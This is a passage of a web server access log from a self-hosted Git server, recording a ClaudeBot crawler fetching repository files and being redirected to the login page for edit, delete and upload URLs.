ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/templates/index.html" -[15/Feb/2026:10:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" [Client 216.73.216.188] [Length 11425] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache?display=rendered" [Client 216.73.216.188] [Length 11027] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa.bundle" [Client 216.73.216.188] [Length 241487] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 10178] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/calculator.py" -[15/Feb/2026:10:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/appsettings.json" [Client 216.73.216.188] [Length 129] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 216.73.216.188] [Length 14350] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 953] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 11286] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/App.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 14922] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/App.tsx" -[15/Feb/2026:10:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" [Client 216.73.216.188] [Length 12484] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 216.73.216.188] [Length 1112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py?display=source" [Client 216.73.216.188] [Length 12555] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 13330] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 11177] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[15/Feb/2026:10:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 216.73.216.188] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13365] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[15/Feb/2026:10:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache?display=rendered" [Client 216.73.216.188] [Length 10978] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props?display=source" [Client 216.73.216.188] [Length 12011] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService" [Client 216.73.216.188] [Length 9811] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" [Client 216.73.216.188] [Length 14421] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 15933] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/App.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 27663] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" [Client 216.73.216.188] [Length 9902] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/App.tsx" -[15/Feb/2026:10:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json?display=rendered" [Client 216.73.216.188] [Length 11113] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/database.sqlite?display=rendered" [Client 216.73.216.188] [Length 11088] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs?display=rendered" [Client 216.73.216.188] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 13179] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 12453] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 216.73.216.188] [Length 9833] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig?display=rendered" [Client 216.73.216.188] [Length 11041] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 9928] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" [Client 216.73.216.188] [Length 11104] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 10009] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 11348] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs?display=rendered" [Client 216.73.216.188] [Length 11110] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" [Client 216.73.216.188] [Length 10526] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 10053] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 11790] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 216.73.216.188] [Length 933] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Header.tsx" [Client 216.73.216.188] [Length 15066] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj?display=source" [Client 216.73.216.188] [Length 11765] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 2071] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache?display=source" [Client 216.73.216.188] [Length 11150] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 9932] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" [Client 216.73.216.188] [Length 11406] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/templates" -[15/Feb/2026:10:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json?display=source" [Client 216.73.216.188] [Length 13267] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 14914] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 216.73.216.188] [Length 413] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 216.73.216.188] [Length 12388] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug" [Client 216.73.216.188] [Length 9884] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 13609] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 10456] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" [Client 216.73.216.188] [Length 37454] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 13324] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:45 +0000] - 200 200 - GET https 